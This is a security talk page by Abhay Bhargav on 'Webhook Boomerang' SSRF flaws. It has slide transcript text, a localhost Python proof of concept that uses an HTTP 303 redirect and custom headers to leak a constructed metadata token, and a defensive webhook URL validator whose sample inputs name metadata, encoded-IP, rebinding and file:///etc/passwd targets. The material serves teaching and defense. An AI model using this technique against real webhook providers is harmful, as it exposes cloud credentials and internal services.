
Hook, Line and Sinker - Pillaging API Webhooks

Webhooks are an important part of modern web services and event-driven applications. They are defined as “user-defined HTTP callbacks” and are triggered by events such as pushing code to a repository or adding a new customer entry in a CRM tool. Webhooks are ubiquitous and gaining in popularity owing to their asynchronous nature and the integration possibilities that they engender.
Webhooks are seen as “harmless” owing to their “one-way” orientation. They are perceived as such because they typically POST some event information to a URL and are done once they receive an HTTP response.

In this talk, I will demonstrate a series of attacks that we dub “Webhook Boomerang flaws”. These flaws allow attackers to leverage webhooks to create a boomerang effect that ends up attacking the originating web service itself. The techniques showcased in this talk will highlight a unique set of attack vectors that piggyback on nothing more than the standard HTTP and DNS protocols, which allow us to perform Server-Side Request Forgery (SSRF) style attacks that can lead to cloud-metadata compromise even with security protections like Metadata Headers. In our research, we’ve discovered this across multiple cloud providers and found that these attacks can be used in more conventional SSRF compromises of internal web services.

Abhay Bhargav

March 29, 2022

Transcript

  1. abhaybhargav Hook, Line and Sinker Pillaging API Webhooks Abhay Bhargav

  2. abhaybhargav Yours Truly • Founder @ we45 • Chief Research Officer - AppSecEngineer • AppSec Automation Junkie • Trainer/Speaker at DEF CON, BlackHat, OWASP Events, etc world-wide • Lead Trainer - we45 Training and Workshops • Co-author of Secure Java For Web Application Development • Author of PCI Compliance: A Definitive Guide
  3. abhaybhargav Community Initiatives • Youtube Channel: AppSecEngineer • Blog: abhaybhargav.com

  4–6. abhaybhargav My talk…

  12. abhaybhargav Agenda • What are webhooks? How do they work? • Common Webhook Attack Patterns • SSRF: A Gentle introduction • Webhook Boomerang Flaws • Interesting Sub-variants
  13. abhaybhargav So you’re building an API…

  14. abhaybhargav You probably need webhooks…

  15. abhaybhargav What are they?

  16. abhaybhargav Webhooks a.k.a “User Generated Callbacks”

  17. abhaybhargav Webhooks are everywhere!

  18. abhaybhargav Common Webhook Traits

  19. abhaybhargav Natural Attack Focus/Assumptions

  20. abhaybhargav Our Focus…

  21. abhaybhargav Our Focus… Can I compromise the Provider? 🤔

  30. abhaybhargav Can I…? Webhook request Attacks the Provider 😈

  31. abhaybhargav This can only mean….

  32. abhaybhargav SSRF!

  33. abhaybhargav What is SSRF?

  34–40. abhaybhargav SSRF - Real-world Examples

  41. abhaybhargav Effects and Impact of SSRF

  50. abhaybhargav What we want…. Webhook request Redirects to Internal/Metadata URL 😈
  51. abhaybhargav But there’s a problem….

  53. abhaybhargav SSRF works… • When there’s a GET request involved • Most Webhooks make POST requests (some PUT cases as well) • Those are difficult to weaponize as an SSRF • Other 3XX redirects either preserve the original method (307/308) or leave it to the client whether to re-issue the POST, so a webhook client will often not follow them as a GET

  55. abhaybhargav HTTP 303 See Other • Is a response that can be returned to an originating POST/PUT request • Usually used for the POST-redirect-GET pattern (the result of the POST is available at another URI) • The follow-up request is a GET (which works for us) • Prompts clients to follow with a GET request to the specified Location
  65. abhaybhargav What we want…. Webhook POST request HTTP 303 Redirect to Metadata/Internal Service 😈 GET request to Metadata/Internal URL
  66. abhaybhargav How we used this on Docker…

  67–81. abhaybhargav [slides with no transcribed text]

  82. abhaybhargav Demo time

  83–86. abhaybhargav Needless to say!

  87. abhaybhargav So what?

  88. abhaybhargav Custom Headers FTW! • Several apps (providers) allow you to configure custom headers for Webhooks • So all you have to do now is use the Cloud Metadata Headers in the Custom Headers and you’re in!
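The exchange from slides 53 to 65 and 88, as an added example that is not part of the deck and not the Docker demo: one local HTTP server plays both the attacker's webhook receiver (which answers the provider's POST with a 303 See Other whose Location points back at an "internal" URL) and a stand-in metadata endpoint that is gated on a static header. `naive_dispatch()` is a provider-side sender written the way many are: it follows the 303 with a GET and forwards the customer's custom headers on every hop. The hostnames, paths, the `FAKE_SECRET` value and the `Metadata-Flavor: Google` gate are constructed for the example; the gate copies GCP's header check, but nothing here talks to a real metadata service.

```python
"""Webhook boomerang via HTTP 303, played out on localhost (constructed demo)."""
import http.client
import json
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import urlsplit

FAKE_SECRET = "constructed-instance-token"   # what /metadata leaks (constructed)


class BoomerangHandler(BaseHTTPRequestHandler):
    def log_message(self, *args):             # keep request logging quiet
        pass

    def do_POST(self):
        # Attacker's receiver: read and discard the webhook body, then bounce
        # the provider's client at an "internal" URL with a 303.
        self.rfile.read(int(self.headers.get("Content-Length", 0)))
        if self.path != "/hook":
            self.send_error(404)
            return
        host, port = self.server.server_address[:2]
        self.send_response(303)
        self.send_header("Location", f"http://{host}:{port}/metadata")
        self.send_header("Content-Length", "0")
        self.end_headers()

    def do_GET(self):
        # Stand-in for a metadata service that insists on a fixed header.
        if self.path != "/metadata":
            self.send_error(404)
            return
        if self.headers.get("Metadata-Flavor") != "Google":
            self.send_error(403, "Missing Metadata-Flavor header")
            return
        body = FAKE_SECRET.encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def start_server():
    srv = ThreadingHTTPServer(("127.0.0.1", 0), BoomerangHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def naive_dispatch(url, event, custom_headers, max_redirects=3):
    """Provider-side sender: POST the event as JSON, follow a 303 with a GET,
    and forward the customer-configured headers on every hop.
    Returns (hops, body); hops is a list of (method, url, status)."""
    method = "POST"
    body = json.dumps(event).encode()
    headers = {"Content-Type": "application/json", **custom_headers}
    hops = []
    for _ in range(max_redirects + 1):
        u = urlsplit(url)
        conn = http.client.HTTPConnection(u.hostname, u.port, timeout=5)
        try:
            conn.request(method, u.path or "/", body=body, headers=headers)
            resp = conn.getresponse()
            data = resp.read()
            location = resp.getheader("Location")
            hops.append((method, url, resp.status))
        finally:
            conn.close()
        if resp.status == 303 and location:
            # RFC 7231 s6.4.4: a 303 is followed with a GET and no body,
            # but the custom headers stay attached to the new request.
            url, method, body = location, "GET", None
            headers.pop("Content-Type", None)
            continue
        return hops, data.decode("utf-8", "replace")
    raise RuntimeError("too many redirects")


def demo():
    """Send one webhook with the metadata header configured and one without."""
    srv = start_server()
    try:
        hook = f"http://127.0.0.1:{srv.server_address[1]}/hook"
        event = {"event": "customer.created", "id": 42}   # constructed payload
        with_header = naive_dispatch(hook, event, {"Metadata-Flavor": "Google"})
        without_header = naive_dispatch(hook, event, {})
        return with_header, without_header
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    (hops, leaked), (hops_plain, _) = demo()
    for method, url, status in hops:
        print(f"{method} {url} -> {status}")
    print("leaked:", leaked)
    print("without the custom header, last hop status:", hops_plain[-1][2])
```

Running it prints the two hops (POST to /hook answered 303, then GET to /metadata answered 200) and the leaked value; without the custom header the second hop is refused with 403, which is exactly what slide 88 is about. Python's `requests` and `urllib` follow a 303 on a POST this way by default, so a dispatcher built on them inherits the behaviour unless redirects are switched off. One caveat when scoping a finding: a static header gate (GCP's `Metadata-Flavor: Google`, Azure's `Metadata: true`) is precisely what a customer-configured header defeats, whereas a gate that first requires a token fetched with a PUT (AWS IMDSv2) cannot be satisfied by a single 303-to-GET hop, so the impact differs per provider and per metadata-service version.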

  90. abhaybhargav App Level IP Blocklisting?

  91. abhaybhargav Defense
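An added example for the "App Level IP Blocklisting?" and "Defense" slides, not code from the talk: it puts the usual app-level blocklist (a string match on the URL) beside a check that resolves the host, tests every answer against the loopback, private and link-local ranges, and pins the one address the dispatcher may connect to. The `FAKE_DNS` table, the hostnames in it and the `BLOCKED_NETWORKS` list are constructed for the example; DNS is injected so it runs offline.

```python
"""Resolver-aware validation of a customer-supplied webhook URL (constructed)."""
import ipaddress
from urllib.parse import urlsplit

# Constructed DNS answers. rebind.example models a DNS-rebinding host that
# advertises a public address next to the metadata address.
FAKE_DNS = {
    "hooks.customer.example": ["203.0.113.10"],
    "metadata-alias.example": ["169.254.169.254"],
    "rebind.example": ["203.0.113.10", "169.254.169.254"],
    "internal-alias.example": ["10.0.0.5"],
}

# Ranges a webhook must never be delivered to: "this host", RFC 1918, CGNAT,
# loopback, link-local (where cloud metadata lives) and IPv6 counterparts.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16",
    "::1/128", "fc00::/7", "fe80::/10",
)]


def naive_is_blocked(url):
    """The pattern the 'App Level IP Blocklisting?' slide questions: a
    literal string match against the metadata IP."""
    return "169.254.169.254" in url


def parse_host_literal(host):
    """Return an ip_address for hosts that are IP literals in any form a
    libc resolver accepts, or None when the host is a DNS name."""
    try:
        return ipaddress.ip_address(host)          # dotted IPv4 or IPv6
    except ValueError:
        pass
    if host.isdigit():                              # http://2852039166/ (inet_aton form)
        try:
            return ipaddress.ip_address(int(host))
        except ValueError:
            pass
    return None


def resolve(host, dns):
    literal = parse_host_literal(host)
    if literal is not None:
        return [literal]
    if host.lower() not in dns:
        raise LookupError(host)
    return [ipaddress.ip_address(a) for a in dns[host.lower()]]


def is_forbidden(addr):
    # Unwrap ::ffff:a.b.c.d so an IPv6 literal cannot smuggle an IPv4 target.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped
    return any(addr in net for net in BLOCKED_NETWORKS)


def check_webhook_target(url, dns=FAKE_DNS):
    """Return (ok, reason, pinned_ip). The dispatcher must connect to
    pinned_ip (setting the Host header itself) and must not follow redirects,
    so neither a second DNS answer nor a 303 can move the request after this
    check has run."""
    u = urlsplit(url)
    if u.scheme not in ("http", "https") or not u.hostname:
        return False, "scheme or host not allowed", None
    try:
        addrs = resolve(u.hostname, dns)
    except LookupError:
        return False, "host does not resolve", None
    for a in addrs:                 # reject if ANY answer is internal
        if is_forbidden(a):
            return False, f"{u.hostname} resolves to {a}", None
    return True, "ok", str(addrs[0])


SAMPLE_URLS = [                     # constructed inputs
    "https://hooks.customer.example/cb",
    "http://169.254.169.254/latest/meta-data/",
    "http://metadata-alias.example/cb",
    "http://2852039166/",
    "http://[::ffff:169.254.169.254]/",
    "http://rebind.example/cb",
    "file:///etc/passwd",
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        ok, why, ip = check_webhook_target(url)
        print(f"{url:45} blocklist={naive_is_blocked(url)!s:5} "
              f"hardened={'allow' if ok else 'deny'} ({why})")
```

The string blocklist lets through a DNS name that points at the metadata address, the decimal-integer form of that address, and the rebinding host; the resolver-aware check denies all of them and a `file:` URL. The check is only as good as the moment it runs: the dispatcher has to open the socket to `pinned_ip` rather than re-resolve the name, and has to treat any 3XX as a delivery failure instead of following it, otherwise the 303 boomerang or a second DNS answer moves the request after validation. Egress filtering from the dispatcher's subnet, blocking the metadata endpoint from that subnet (or, on AWS, requiring IMDSv2) and never forwarding customer headers to any host other than the validated one are the further layers a holistic defense adds.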

  97. abhaybhargav Conclusions • Webhooks are a powerful way to integrate your apps with others • Also a powerful way to get attacked with “Boomerang Attacks” • Consider webhooks in your threat model - multiple attack angles • SSRF is an attacker’s good friend • Look at defense holistically, and from multiple layers
  98. abhaybhargav Thank you • Twitter: @abhaybhargav, @AppSecEngineer, @we45 • Youtube: AppSecEngineer • Website: appsecengineer.com, we45.com